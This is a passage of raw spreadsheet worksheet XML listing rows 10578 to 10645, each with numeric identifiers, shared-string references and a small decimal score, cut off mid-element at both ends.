      </c>
      <c r="D10578" s="2">
        <v>1.0</v>
      </c>
      <c r="E10578" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10578" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10579" ht="15.75" customHeight="1">
      <c r="A10579" s="1">
        <v>13479.0</v>
      </c>
      <c r="B10579" s="2">
        <v>3.5324107E7</v>
      </c>
      <c r="C10579" s="2" t="s">
        <v>10129</v>
      </c>
      <c r="D10579" s="2">
        <v>1.0</v>
      </c>
      <c r="E10579" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10579" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10580" ht="15.75" customHeight="1">
      <c r="A10580" s="1">
        <v>14233.0</v>
      </c>
      <c r="B10580" s="2">
        <v>3.8303215E7</v>
      </c>
      <c r="C10580" s="2" t="s">
        <v>10130</v>
      </c>
      <c r="D10580" s="2">
        <v>1.0</v>
      </c>
      <c r="E10580" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10580" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10581" ht="15.75" customHeight="1">
      <c r="A10581" s="1">
        <v>14758.0</v>
      </c>
      <c r="B10581" s="2">
        <v>4.0806429E7</v>
      </c>
      <c r="C10581" s="2" t="s">
        <v>10131</v>
      </c>
      <c r="D10581" s="2">
        <v>1.0</v>
      </c>
      <c r="E10581" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10581" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10582" ht="15.75" customHeight="1">
      <c r="A10582" s="1">
        <v>16138.0</v>
      </c>
      <c r="B10582" s="2">
        <v>4.5545864E7</v>
      </c>
      <c r="C10582" s="2" t="s">
        <v>10132</v>
      </c>
      <c r="D10582" s="2">
        <v>1.0</v>
      </c>
      <c r="E10582" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10582" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10583" ht="15.75" customHeight="1">
      <c r="A10583" s="1">
        <v>16176.0</v>
      </c>
      <c r="B10583" s="2">
        <v>4.5648889E7</v>
      </c>
      <c r="C10583" s="2" t="s">
        <v>10133</v>
      </c>
      <c r="D10583" s="2">
        <v>1.0</v>
      </c>
      <c r="E10583" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10583" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10584" ht="15.75" customHeight="1">
      <c r="A10584" s="1">
        <v>17056.0</v>
      </c>
      <c r="B10584" s="2">
        <v>4.855184E7</v>
      </c>
      <c r="C10584" s="2" t="s">
        <v>10134</v>
      </c>
      <c r="D10584" s="2">
        <v>1.0</v>
      </c>
      <c r="E10584" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10584" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10585" ht="15.75" customHeight="1">
      <c r="A10585" s="1">
        <v>17277.0</v>
      </c>
      <c r="B10585" s="2">
        <v>4.9204205E7</v>
      </c>
      <c r="C10585" s="2" t="s">
        <v>10135</v>
      </c>
      <c r="D10585" s="2">
        <v>1.0</v>
      </c>
      <c r="E10585" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10585" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10586" ht="15.75" customHeight="1">
      <c r="A10586" s="1">
        <v>18813.0</v>
      </c>
      <c r="B10586" s="2">
        <v>5.3912787E7</v>
      </c>
      <c r="C10586" s="2" t="s">
        <v>10136</v>
      </c>
      <c r="D10586" s="2">
        <v>1.0</v>
      </c>
      <c r="E10586" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10586" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10587" ht="15.75" customHeight="1">
      <c r="A10587" s="1">
        <v>18862.0</v>
      </c>
      <c r="B10587" s="2">
        <v>5.3998898E7</v>
      </c>
      <c r="C10587" s="2" t="s">
        <v>10137</v>
      </c>
      <c r="D10587" s="2">
        <v>1.0</v>
      </c>
      <c r="E10587" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10587" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10588" ht="15.75" customHeight="1">
      <c r="A10588" s="1">
        <v>18893.0</v>
      </c>
      <c r="B10588" s="2">
        <v>5.4129725E7</v>
      </c>
      <c r="C10588" s="2" t="s">
        <v>10138</v>
      </c>
      <c r="D10588" s="2">
        <v>1.0</v>
      </c>
      <c r="E10588" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10588" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10589" ht="15.75" customHeight="1">
      <c r="A10589" s="1">
        <v>18923.0</v>
      </c>
      <c r="B10589" s="2">
        <v>5.4235964E7</v>
      </c>
      <c r="C10589" s="2" t="s">
        <v>10139</v>
      </c>
      <c r="D10589" s="2">
        <v>1.0</v>
      </c>
      <c r="E10589" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10589" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10590" ht="15.75" customHeight="1">
      <c r="A10590" s="1">
        <v>23515.0</v>
      </c>
      <c r="B10590" s="2">
        <v>5836853.0</v>
      </c>
      <c r="C10590" s="2" t="s">
        <v>10140</v>
      </c>
      <c r="D10590" s="2">
        <v>1.0</v>
      </c>
      <c r="E10590" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10590" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10591" ht="15.75" customHeight="1">
      <c r="A10591" s="1">
        <v>25349.0</v>
      </c>
      <c r="B10591" s="2">
        <v>1.3552037E7</v>
      </c>
      <c r="C10591" s="2" t="s">
        <v>10141</v>
      </c>
      <c r="D10591" s="2">
        <v>1.0</v>
      </c>
      <c r="E10591" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10591" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10592" ht="15.75" customHeight="1">
      <c r="A10592" s="1">
        <v>26057.0</v>
      </c>
      <c r="B10592" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C10592" s="2" t="s">
        <v>10142</v>
      </c>
      <c r="D10592" s="2">
        <v>1.0</v>
      </c>
      <c r="E10592" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10592" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10593" ht="15.75" customHeight="1">
      <c r="A10593" s="1">
        <v>27001.0</v>
      </c>
      <c r="B10593" s="2">
        <v>1.9929362E7</v>
      </c>
      <c r="C10593" s="2" t="s">
        <v>10143</v>
      </c>
      <c r="D10593" s="2">
        <v>1.0</v>
      </c>
      <c r="E10593" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10593" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10594" ht="15.75" customHeight="1">
      <c r="A10594" s="1">
        <v>28379.0</v>
      </c>
      <c r="B10594" s="2">
        <v>2.6105639E7</v>
      </c>
      <c r="C10594" s="2" t="s">
        <v>10144</v>
      </c>
      <c r="D10594" s="2">
        <v>1.0</v>
      </c>
      <c r="E10594" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10594" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10595" ht="15.75" customHeight="1">
      <c r="A10595" s="1">
        <v>4064.0</v>
      </c>
      <c r="B10595" s="2">
        <v>4.1148167E7</v>
      </c>
      <c r="C10595" s="2" t="s">
        <v>10145</v>
      </c>
      <c r="D10595" s="2">
        <v>1.0</v>
      </c>
      <c r="E10595" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10595" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="10596" ht="15.75" customHeight="1">
      <c r="A10596" s="1">
        <v>9235.0</v>
      </c>
      <c r="B10596" s="2">
        <v>5.5456924E7</v>
      </c>
      <c r="C10596" s="2" t="s">
        <v>10146</v>
      </c>
      <c r="D10596" s="2">
        <v>1.0</v>
      </c>
      <c r="E10596" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10596" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="10597" ht="15.75" customHeight="1">
      <c r="A10597" s="1">
        <v>14568.0</v>
      </c>
      <c r="B10597" s="2">
        <v>4.0060257E7</v>
      </c>
      <c r="C10597" s="2" t="s">
        <v>10147</v>
      </c>
      <c r="D10597" s="2">
        <v>1.0</v>
      </c>
      <c r="E10597" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10597" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="10598" ht="15.75" customHeight="1">
      <c r="A10598" s="1">
        <v>8618.0</v>
      </c>
      <c r="B10598" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C10598" s="2" t="s">
        <v>10148</v>
      </c>
      <c r="D10598" s="2">
        <v>1.0</v>
      </c>
      <c r="E10598" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10598" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="10599" ht="15.75" customHeight="1">
      <c r="A10599" s="1">
        <v>10210.0</v>
      </c>
      <c r="B10599" s="2">
        <v>5.7428764E7</v>
      </c>
      <c r="C10599" s="2" t="s">
        <v>10149</v>
      </c>
      <c r="D10599" s="2">
        <v>1.0</v>
      </c>
      <c r="E10599" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10599" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="10600" ht="15.75" customHeight="1">
      <c r="A10600" s="1">
        <v>12995.0</v>
      </c>
      <c r="B10600" s="2">
        <v>3.2772026E7</v>
      </c>
      <c r="C10600" s="2" t="s">
        <v>10150</v>
      </c>
      <c r="D10600" s="2">
        <v>1.0</v>
      </c>
      <c r="E10600" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10600" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="10601" ht="15.75" customHeight="1">
      <c r="A10601" s="1">
        <v>17703.0</v>
      </c>
      <c r="B10601" s="2">
        <v>5.0593729E7</v>
      </c>
      <c r="C10601" s="2" t="s">
        <v>10151</v>
      </c>
      <c r="D10601" s="2">
        <v>1.0</v>
      </c>
      <c r="E10601" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10601" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="10602" ht="15.75" customHeight="1">
      <c r="A10602" s="1">
        <v>12838.0</v>
      </c>
      <c r="B10602" s="2">
        <v>3.1677536E7</v>
      </c>
      <c r="C10602" s="2" t="s">
        <v>10152</v>
      </c>
      <c r="D10602" s="2">
        <v>1.0</v>
      </c>
      <c r="E10602" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10602" s="2">
        <v>0.09887005649717513</v>
      </c>
    </row>
    <row r="10603" ht="15.75" customHeight="1">
      <c r="A10603" s="1">
        <v>18710.0</v>
      </c>
      <c r="B10603" s="2">
        <v>5.3648482E7</v>
      </c>
      <c r="C10603" s="2" t="s">
        <v>10153</v>
      </c>
      <c r="D10603" s="2">
        <v>1.0</v>
      </c>
      <c r="E10603" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10603" s="2">
        <v>0.09865900383141762</v>
      </c>
    </row>
    <row r="10604" ht="15.75" customHeight="1">
      <c r="A10604" s="1">
        <v>13571.0</v>
      </c>
      <c r="B10604" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C10604" s="2" t="s">
        <v>10154</v>
      </c>
      <c r="D10604" s="2">
        <v>1.0</v>
      </c>
      <c r="E10604" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10604" s="2">
        <v>0.09844054580896687</v>
      </c>
    </row>
    <row r="10605" ht="15.75" customHeight="1">
      <c r="A10605" s="1">
        <v>4482.0</v>
      </c>
      <c r="B10605" s="2">
        <v>4.2502922E7</v>
      </c>
      <c r="C10605" s="2" t="s">
        <v>10155</v>
      </c>
      <c r="D10605" s="2">
        <v>1.0</v>
      </c>
      <c r="E10605" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10605" s="2">
        <v>0.09844054580896684</v>
      </c>
    </row>
    <row r="10606" ht="15.75" customHeight="1">
      <c r="A10606" s="1">
        <v>13527.0</v>
      </c>
      <c r="B10606" s="2">
        <v>3.5529971E7</v>
      </c>
      <c r="C10606" s="2" t="s">
        <v>10156</v>
      </c>
      <c r="D10606" s="2">
        <v>1.0</v>
      </c>
      <c r="E10606" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10606" s="2">
        <v>0.09844054580896684</v>
      </c>
    </row>
    <row r="10607" ht="15.75" customHeight="1">
      <c r="A10607" s="1">
        <v>488.0</v>
      </c>
      <c r="B10607" s="2">
        <v>1.7570216E7</v>
      </c>
      <c r="C10607" s="2" t="s">
        <v>10157</v>
      </c>
      <c r="D10607" s="2">
        <v>1.0</v>
      </c>
      <c r="E10607" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10607" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="10608" ht="15.75" customHeight="1">
      <c r="A10608" s="1">
        <v>5171.0</v>
      </c>
      <c r="B10608" s="2">
        <v>4.4751794E7</v>
      </c>
      <c r="C10608" s="2" t="s">
        <v>10158</v>
      </c>
      <c r="D10608" s="2">
        <v>1.0</v>
      </c>
      <c r="E10608" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10608" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="10609" ht="15.75" customHeight="1">
      <c r="A10609" s="1">
        <v>32384.0</v>
      </c>
      <c r="B10609" s="2">
        <v>5.6199578E7</v>
      </c>
      <c r="C10609" s="2" t="s">
        <v>10159</v>
      </c>
      <c r="D10609" s="2">
        <v>1.0</v>
      </c>
      <c r="E10609" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10609" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="10610" ht="15.75" customHeight="1">
      <c r="A10610" s="1">
        <v>4343.0</v>
      </c>
      <c r="B10610" s="2">
        <v>4.2077116E7</v>
      </c>
      <c r="C10610" s="2" t="s">
        <v>10160</v>
      </c>
      <c r="D10610" s="2">
        <v>1.0</v>
      </c>
      <c r="E10610" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10610" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="10611" ht="15.75" customHeight="1">
      <c r="A10611" s="1">
        <v>13261.0</v>
      </c>
      <c r="B10611" s="2">
        <v>3.4312947E7</v>
      </c>
      <c r="C10611" s="2" t="s">
        <v>10161</v>
      </c>
      <c r="D10611" s="2">
        <v>1.0</v>
      </c>
      <c r="E10611" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10611" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="10612" ht="15.75" customHeight="1">
      <c r="A10612" s="1">
        <v>15574.0</v>
      </c>
      <c r="B10612" s="2">
        <v>4.3437518E7</v>
      </c>
      <c r="C10612" s="2" t="s">
        <v>10162</v>
      </c>
      <c r="D10612" s="2">
        <v>1.0</v>
      </c>
      <c r="E10612" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10612" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="10613" ht="15.75" customHeight="1">
      <c r="A10613" s="1">
        <v>26470.0</v>
      </c>
      <c r="B10613" s="2">
        <v>1.7386372E7</v>
      </c>
      <c r="C10613" s="2" t="s">
        <v>10163</v>
      </c>
      <c r="D10613" s="2">
        <v>1.0</v>
      </c>
      <c r="E10613" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10613" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="10614" ht="15.75" customHeight="1">
      <c r="A10614" s="1">
        <v>12541.0</v>
      </c>
      <c r="B10614" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C10614" s="2" t="s">
        <v>10164</v>
      </c>
      <c r="D10614" s="2">
        <v>1.0</v>
      </c>
      <c r="E10614" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10614" s="2">
        <v>0.09821428571428568</v>
      </c>
    </row>
    <row r="10615" ht="15.75" customHeight="1">
      <c r="A10615" s="1">
        <v>1563.0</v>
      </c>
      <c r="B10615" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C10615" s="2" t="s">
        <v>10165</v>
      </c>
      <c r="D10615" s="2">
        <v>1.0</v>
      </c>
      <c r="E10615" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10615" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="10616" ht="15.75" customHeight="1">
      <c r="A10616" s="1">
        <v>4165.0</v>
      </c>
      <c r="B10616" s="2">
        <v>4.1526589E7</v>
      </c>
      <c r="C10616" s="2" t="s">
        <v>10166</v>
      </c>
      <c r="D10616" s="2">
        <v>1.0</v>
      </c>
      <c r="E10616" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10616" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="10617" ht="15.75" customHeight="1">
      <c r="A10617" s="1">
        <v>22612.0</v>
      </c>
      <c r="B10617" s="2">
        <v>3997670.0</v>
      </c>
      <c r="C10617" s="2" t="s">
        <v>10167</v>
      </c>
      <c r="D10617" s="2">
        <v>1.0</v>
      </c>
      <c r="E10617" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10617" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="10618" ht="15.75" customHeight="1">
      <c r="A10618" s="1">
        <v>358.0</v>
      </c>
      <c r="B10618" s="2">
        <v>1.6111313E7</v>
      </c>
      <c r="C10618" s="2" t="s">
        <v>10168</v>
      </c>
      <c r="D10618" s="2">
        <v>1.0</v>
      </c>
      <c r="E10618" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10618" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="10619" ht="15.75" customHeight="1">
      <c r="A10619" s="1">
        <v>26645.0</v>
      </c>
      <c r="B10619" s="2">
        <v>1.8048644E7</v>
      </c>
      <c r="C10619" s="2" t="s">
        <v>10169</v>
      </c>
      <c r="D10619" s="2">
        <v>1.0</v>
      </c>
      <c r="E10619" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10619" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="10620" ht="15.75" customHeight="1">
      <c r="A10620" s="1">
        <v>594.0</v>
      </c>
      <c r="B10620" s="2">
        <v>1.9198351E7</v>
      </c>
      <c r="C10620" s="2" t="s">
        <v>10170</v>
      </c>
      <c r="D10620" s="2">
        <v>1.0</v>
      </c>
      <c r="E10620" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10620" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10621" ht="15.75" customHeight="1">
      <c r="A10621" s="1">
        <v>2789.0</v>
      </c>
      <c r="B10621" s="2">
        <v>3.524357E7</v>
      </c>
      <c r="C10621" s="2" t="s">
        <v>10171</v>
      </c>
      <c r="D10621" s="2">
        <v>1.0</v>
      </c>
      <c r="E10621" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10621" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10622" ht="15.75" customHeight="1">
      <c r="A10622" s="1">
        <v>4675.0</v>
      </c>
      <c r="B10622" s="2">
        <v>4.3172934E7</v>
      </c>
      <c r="C10622" s="2" t="s">
        <v>10172</v>
      </c>
      <c r="D10622" s="2">
        <v>1.0</v>
      </c>
      <c r="E10622" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10622" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10623" ht="15.75" customHeight="1">
      <c r="A10623" s="1">
        <v>9202.0</v>
      </c>
      <c r="B10623" s="2">
        <v>5.5398084E7</v>
      </c>
      <c r="C10623" s="2" t="s">
        <v>10173</v>
      </c>
      <c r="D10623" s="2">
        <v>1.0</v>
      </c>
      <c r="E10623" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10623" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10624" ht="15.75" customHeight="1">
      <c r="A10624" s="1">
        <v>12004.0</v>
      </c>
      <c r="B10624" s="2">
        <v>2.5961838E7</v>
      </c>
      <c r="C10624" s="2" t="s">
        <v>10174</v>
      </c>
      <c r="D10624" s="2">
        <v>1.0</v>
      </c>
      <c r="E10624" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10624" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10625" ht="15.75" customHeight="1">
      <c r="A10625" s="1">
        <v>15550.0</v>
      </c>
      <c r="B10625" s="2">
        <v>4.3398524E7</v>
      </c>
      <c r="C10625" s="2" t="s">
        <v>10175</v>
      </c>
      <c r="D10625" s="2">
        <v>1.0</v>
      </c>
      <c r="E10625" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10625" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10626" ht="15.75" customHeight="1">
      <c r="A10626" s="1">
        <v>15898.0</v>
      </c>
      <c r="B10626" s="2">
        <v>4.4574801E7</v>
      </c>
      <c r="C10626" s="2" t="s">
        <v>10176</v>
      </c>
      <c r="D10626" s="2">
        <v>1.0</v>
      </c>
      <c r="E10626" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10626" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10627" ht="15.75" customHeight="1">
      <c r="A10627" s="1">
        <v>19010.0</v>
      </c>
      <c r="B10627" s="2">
        <v>5.4507069E7</v>
      </c>
      <c r="C10627" s="2" t="s">
        <v>10177</v>
      </c>
      <c r="D10627" s="2">
        <v>1.0</v>
      </c>
      <c r="E10627" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10627" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10628" ht="15.75" customHeight="1">
      <c r="A10628" s="1">
        <v>19139.0</v>
      </c>
      <c r="B10628" s="2">
        <v>5.48213E7</v>
      </c>
      <c r="C10628" s="2" t="s">
        <v>10178</v>
      </c>
      <c r="D10628" s="2">
        <v>1.0</v>
      </c>
      <c r="E10628" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10628" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10629" ht="15.75" customHeight="1">
      <c r="A10629" s="1">
        <v>25828.0</v>
      </c>
      <c r="B10629" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C10629" s="2" t="s">
        <v>10179</v>
      </c>
      <c r="D10629" s="2">
        <v>1.0</v>
      </c>
      <c r="E10629" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10629" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="10630" ht="15.75" customHeight="1">
      <c r="A10630" s="1">
        <v>1828.0</v>
      </c>
      <c r="B10630" s="2">
        <v>2.9328388E7</v>
      </c>
      <c r="C10630" s="2" t="s">
        <v>10180</v>
      </c>
      <c r="D10630" s="2">
        <v>1.0</v>
      </c>
      <c r="E10630" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10630" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="10631" ht="15.75" customHeight="1">
      <c r="A10631" s="1">
        <v>26609.0</v>
      </c>
      <c r="B10631" s="2">
        <v>1.8013284E7</v>
      </c>
      <c r="C10631" s="2" t="s">
        <v>10181</v>
      </c>
      <c r="D10631" s="2">
        <v>1.0</v>
      </c>
      <c r="E10631" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10631" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="10632" ht="15.75" customHeight="1">
      <c r="A10632" s="1">
        <v>3720.0</v>
      </c>
      <c r="B10632" s="2">
        <v>3.9613235E7</v>
      </c>
      <c r="C10632" s="2" t="s">
        <v>10182</v>
      </c>
      <c r="D10632" s="2">
        <v>1.0</v>
      </c>
      <c r="E10632" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10632" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="10633" ht="15.75" customHeight="1">
      <c r="A10633" s="1">
        <v>7679.0</v>
      </c>
      <c r="B10633" s="2">
        <v>5.191851E7</v>
      </c>
      <c r="C10633" s="2" t="s">
        <v>10183</v>
      </c>
      <c r="D10633" s="2">
        <v>1.0</v>
      </c>
      <c r="E10633" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10633" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="10634" ht="15.75" customHeight="1">
      <c r="A10634" s="1">
        <v>12862.0</v>
      </c>
      <c r="B10634" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C10634" s="2" t="s">
        <v>10184</v>
      </c>
      <c r="D10634" s="2">
        <v>1.0</v>
      </c>
      <c r="E10634" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10634" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="10635" ht="15.75" customHeight="1">
      <c r="A10635" s="1">
        <v>17438.0</v>
      </c>
      <c r="B10635" s="2">
        <v>4.9737928E7</v>
      </c>
      <c r="C10635" s="2" t="s">
        <v>10185</v>
      </c>
      <c r="D10635" s="2">
        <v>1.0</v>
      </c>
      <c r="E10635" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10635" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="10636" ht="15.75" customHeight="1">
      <c r="A10636" s="1">
        <v>17704.0</v>
      </c>
      <c r="B10636" s="2">
        <v>5.0593729E7</v>
      </c>
      <c r="C10636" s="2" t="s">
        <v>10186</v>
      </c>
      <c r="D10636" s="2">
        <v>1.0</v>
      </c>
      <c r="E10636" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10636" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="10637" ht="15.75" customHeight="1">
      <c r="A10637" s="1">
        <v>28788.0</v>
      </c>
      <c r="B10637" s="2">
        <v>2.8528827E7</v>
      </c>
      <c r="C10637" s="2" t="s">
        <v>10187</v>
      </c>
      <c r="D10637" s="2">
        <v>1.0</v>
      </c>
      <c r="E10637" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10637" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="10638" ht="15.75" customHeight="1">
      <c r="A10638" s="1">
        <v>3026.0</v>
      </c>
      <c r="B10638" s="2">
        <v>3.6435434E7</v>
      </c>
      <c r="C10638" s="2" t="s">
        <v>10188</v>
      </c>
      <c r="D10638" s="2">
        <v>1.0</v>
      </c>
      <c r="E10638" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10638" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10639" ht="15.75" customHeight="1">
      <c r="A10639" s="1">
        <v>4797.0</v>
      </c>
      <c r="B10639" s="2">
        <v>4.3508251E7</v>
      </c>
      <c r="C10639" s="2" t="s">
        <v>10189</v>
      </c>
      <c r="D10639" s="2">
        <v>1.0</v>
      </c>
      <c r="E10639" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10639" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10640" ht="15.75" customHeight="1">
      <c r="A10640" s="1">
        <v>5625.0</v>
      </c>
      <c r="B10640" s="2">
        <v>4.6194098E7</v>
      </c>
      <c r="C10640" s="2" t="s">
        <v>10190</v>
      </c>
      <c r="D10640" s="2">
        <v>1.0</v>
      </c>
      <c r="E10640" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10640" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10641" ht="15.75" customHeight="1">
      <c r="A10641" s="1">
        <v>11464.0</v>
      </c>
      <c r="B10641" s="2">
        <v>2.1946343E7</v>
      </c>
      <c r="C10641" s="2" t="s">
        <v>10191</v>
      </c>
      <c r="D10641" s="2">
        <v>1.0</v>
      </c>
      <c r="E10641" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10641" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10642" ht="15.75" customHeight="1">
      <c r="A10642" s="1">
        <v>11784.0</v>
      </c>
      <c r="B10642" s="2">
        <v>2.4301488E7</v>
      </c>
      <c r="C10642" s="2" t="s">
        <v>10192</v>
      </c>
      <c r="D10642" s="2">
        <v>1.0</v>
      </c>
      <c r="E10642" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10642" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10643" ht="15.75" customHeight="1">
      <c r="A10643" s="1">
        <v>13683.0</v>
      </c>
      <c r="B10643" s="2">
        <v>3.6077003E7</v>
      </c>
      <c r="C10643" s="2" t="s">
        <v>10193</v>
      </c>
      <c r="D10643" s="2">
        <v>1.0</v>
      </c>
      <c r="E10643" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10643" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10644" ht="15.75" customHeight="1">
      <c r="A10644" s="1">
        <v>14469.0</v>
      </c>
      <c r="B10644" s="2">
        <v>3.9504605E7</v>
      </c>
      <c r="C10644" s="2" t="s">
        <v>10194</v>
      </c>
      <c r="D10644" s="2">
        <v>1.0</v>
      </c>
      <c r="E10644" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10644" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10645" ht="15.75" customHeight="1">
      <c r="A10645" s="1">
        <v>19267.0</v>
      </c>
      <c r="B10645" s="2">
        <v>5.5153381E7</v>
      </c>
      <c r="C10645" s="2" t="s">
        <v>10195</v>
